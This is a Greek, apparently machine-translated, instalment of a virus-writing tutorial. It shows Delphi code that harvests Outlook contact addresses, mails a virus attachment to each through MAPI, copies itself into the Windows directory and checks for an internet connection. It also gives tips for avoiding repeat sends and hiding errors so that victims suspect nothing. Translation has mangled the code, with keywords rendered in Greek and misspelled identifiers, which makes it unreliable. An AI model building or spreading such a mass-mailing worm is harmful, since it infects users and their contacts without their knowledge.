Σε γενικές γραμμές, η διαδικασία για την αφαίρεση του βιβλίου διευθύνσεων θα πρέπει να μοιάζει με:

χρήσεις
ComObj, outlook_tlb,
Έντυπα;
....
Διαδικασία GET MAILS;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s:string;
num, i: Ακέραιος;
αλληλογραφία: συστοιχία συμβολοσειράς?

αρχίζουν
MSOutlook:= CreateOleObject("Outlook.Application");
MyNameSpace:= MSOutlook.GetNameSpace("MAPI");
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength(mails,MyFilder.Items.Count);
για i:= 1 στο MyFolder.Items.Count do
αρχίζουν
MyItem:= MyFolder.Items[i];
mails[i]:= myitem.email1addres;
τέλος;

Λοιπόν, σας άρεσε αυτό που έγραψα; Ρε, θα χειροτερέψει. Επειδή ο ιός θα σταλεί χρησιμοποιώντας ένα καθαρό API. Και αυτό, όπως λέει ο Horrific: «Το ίδιο με το χειρωνακτικό σεξ υπάρχει και στις δύο περιπτώσεις, αλλά χρειάζεται πολύς χρόνος για να το πετύχεις και δεν υπάρχει τέτοιο βουητό» :) Λοιπόν
λοιπόν τι έγραψα εδώ; Χρήσεις Το Comobj μας επιτρέπει να εργαζόμαστε με την τεχνολογία COM. Στη συνέχεια, απλώς δημιουργούμε ένα αντικείμενο OLE Outlook και λαμβάνουμε κυκλικά μια λίστα email από αυτό. Αν θέλετε να μάθετε κάτι άλλο
- αυτό είναι επίσης πραγματικό, διαβάστε τα έγγραφα - κυβερνούν. Ακόμα και στα αγγλικά. Η λίστα των email είναι γραμμένη σε μια δυναμική σειρά συμβολοσειρών. Θα χρησιμοποιηθεί από τη συνάρτηση SendVirus. Αυτό:

συνάρτηση SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i:ακέραιος;
s:string;
αρχίζουν
ξεκινήστε με το MapiRecipDesc
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= μηδέν;
τέλος;

ξεκινήστε με το MapiFileDesc
ulReserved:= 0;
flFlags:= 0;
nΘέση:= 0;
lpszPathName:= PChar(Συνημμένο);
lpszFileName:= μηδέν;
lpFileType:= μηδέν;
τέλος;

ξεκινήστε με το MapiMessage
ulReserved:= 0;
lpszSubject:= μηδέν;
lpszNoteText:= PChar(Θέμα);
lpszMessageType:= μηδέν;
lpszDateReceived:= μηδέν;
lpszConversationID:= μηδέν;
flFlags:= 0;
lpOriginator:= μηδέν;
nRecipCount:= 1;
lpRecips:= @MapiRecipDesc;
αν μήκος (Συνημμένο) > 0 τότε ξεκινήστε
nFileCount:= 1;
lpFiles:= @MapiFileDesc;
τέλος άλλο αρχίζουν
nFileCount:= 0;
lpFiles:= μηδέν;
τέλος;
τέλος;

Αποτέλεσμα:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
ή MAPI_LOGON_UI ή MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
τέλος;

Πρήξατε διαβάζοντας αυτό; Πήγαινε και πιες μια μπύρα, αλλιώς δεν θα καταλάβεις τίποτα.
Ήπιες; Και εγώ 😉 Εντάξει, ας συνεχίσουμε. Θα το χρησιμοποιήσετε ως εξής:

Για i:= 1 έως μήκος (mails) κάνει
αρχίζουν
SendVirus("",mails[i],"pricol".");
τέλος;

Θα χρησιμοποιήσουμε χρήσεις MAPI εδώ, οπότε μην ξεχάσετε να το δηλώσετε. Με λίγα λόγια αυτό
- εργασία χαμηλού επιπέδου με αλληλογραφία. Και για να εργαστείτε με την αλληλογραφία, όπως γνωρίζετε, πρέπει να έχετε ένα)
email παραλήπτη β) κείμενο επιστολής γ) συνημμένο. Ετσι κανω εγω:
MapiRecipDesc ​​- περιγραφή του παραλήπτη, MapiFileDesc - συνημμένο,
εκείνοι. Ο ιός μας, το MapiMessage είναι ένα μήνυμα, τότε θα το στείλω στον μεγάλο κόσμο με την εντολή MapiSendMail 😉 Λοιπόν, αποδείχθηκε ότι δεν ήταν τόσο δύσκολο. Το κύριο πράγμα είναι να καταλάβεις ότι ο μεγαλύτερος φίλος σου
- αυτό δεν είναι c:\porno, αλλά win32.hlp :)

Πώς μπορούμε τώρα να εντάξουμε όλο αυτό το βερνίκι στην σκληρή λογική του ιού; Θα το καταλάβετε μόνοι σας, σας το λέω για 2 άρθρα στη σειρά. Και τέλος πάντων, χθες γιόρτασα τα γενέθλια της κοπέλας μου, τώρα το κεφάλι μου χτυπάει λίγο δυνατά :) Λοιπόν, εντάξει, η αίσθηση του καθήκοντος είναι πιο δυνατή. Απλά κάνε το:
Η πρώτη γραμμή είναι να ελέγξετε το όνομα του αρχείου από το οποίο ξεκινήσατε. Αν
Το pricol.exe σημαίνει CopyFile στα Windows :) Και αν ξεκινήσατε από τον κατάλογο των Windows
- στη συνέχεια ελέγξτε κυκλικά τη σύνδεσή σας με το παγκόσμιο δίκτυο 😉. Ελέγχουμε:

λειτουργία IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
αρχίζουν
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Αποτέλεσμα:= (Res = 0) και (dwCount > 0);
τέλος;

Ετσι. Εάν όλα είναι εντάξει, τότε προχωρήστε - ανακινήστε το βιβλίο διευθύνσεών σας και στείλτε το mail. Υπάρχουν δύο κόλπα εδώ. Αν το όνομά σας
pricol.exe - ελέγξτε αμέσως τη σύνδεση. Ο χρήστης μπορεί να ελέγχει το ηλεκτρονικό ταχυδρομείο στο διαδίκτυο. Αυτό θα αυξήσει σημαντικά τις πιθανότητές μας να λάβουμε ένα ενημερωτικό δελτίο. Έχετε ήδη καταλάβει μόνοι σας το δεύτερο κόλπο,
Δηλαδή, στο σενάριο που περιέγραψα, θα στέλνετε πάντα πανομοιότυπα γράμματα στον ίδιο χρήστη, μόνο και μόνο επειδή δεν έχει διαγραφεί από το βιβλίο διευθύνσεων. Επομένως, σημειώστε όλες τις επεξεργασμένες διευθύνσεις σε ένα αρχείο καταγραφής και ελέγχετε συνεχώς. Αυτό φαίνεται να είναι. Αν και όχι. Μην ξεχάσετε να εσωκλείσετε θραύσματα κώδικα επιρρεπή σε σφάλματα στο try...εκτός. Και βάλτε το κλειδί ($D-). Επειδή αν ο χρήστης πιάσει ξαφνικά ένα σφάλμα όπως το "FUCK" δεν είναι έγκυρη ακέραια τιμή," θα υποψιαστεί κάτι.

ΣΥΜΠΕΡΑΣΜΑ

Αυτό το τελευταίο άρθρο αφορά τους ιούς που έχουν εντοπιστεί σφαλμάτων για τα Windows 9x. Πρόσφατα μορφοποίησα τη βίδα και εγκατέστησα το WindowsXP Professional, οπότε τα ακόλουθα παραδείγματα θα είναι για αυτήν. Και μπορείς ήδη σιγά σιγά να αγοράσεις το Delphi 7, αφού κάπου έσπειρα τα έκτα μου και τώρα κάθομαι εντελώς γυμνός :) Θα αγοράσω τα έβδομα, ανάλογα 😉

Το επόμενο άρθρο μάλλον θα είναι αφιερωμένο στη στεγανογραφία και στην πρακτική εφαρμογή της.